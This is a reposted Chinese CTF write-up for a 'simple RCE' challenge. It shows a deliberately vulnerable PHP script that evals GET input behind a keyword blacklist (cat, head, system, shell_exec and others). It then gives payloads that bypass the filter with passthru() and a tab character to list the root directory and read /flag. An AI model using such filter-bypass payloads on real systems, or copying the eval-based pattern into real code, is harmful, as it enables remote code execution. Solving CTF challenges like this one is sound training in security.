polar CTF 简单rce

发布时间：2024年01月03日

一、题目

<?php
/*

PolarD&N CTF

*/
highlight_file(__FILE__);
function no($txt){
    if(!preg_match("/cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen| /i", $txt)){
    return $txt;}
   else{
die("what's up");}}
$yyds=($_POST['yyds']);
if(isset($_GET['sys'])&&$yyds=='666'){
  eval(no($_GET['sys']));
  }
  else
    {echo "nonono";
}
?> nonono

二、解题
1、知识

passthru() 只调用命令，把命令的运行结果原样地直接输出到标准输出设备上。（替换system）

payload

get
?sys=passthru('ls%09/');

post
yyds=666

在这里插入图片描述
payload

get
?sys=passthru('sort%09/flag');

post
yyds=666

在这里插入图片描述

文章来源:https://blog.csdn.net/qq_36286161/article/details/135375064
本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若内容造成侵权/违法违规/事实不符，请联系我的编程经验分享网邮箱：chenni525@qq.com进行投诉反馈，一经查实，立即删除！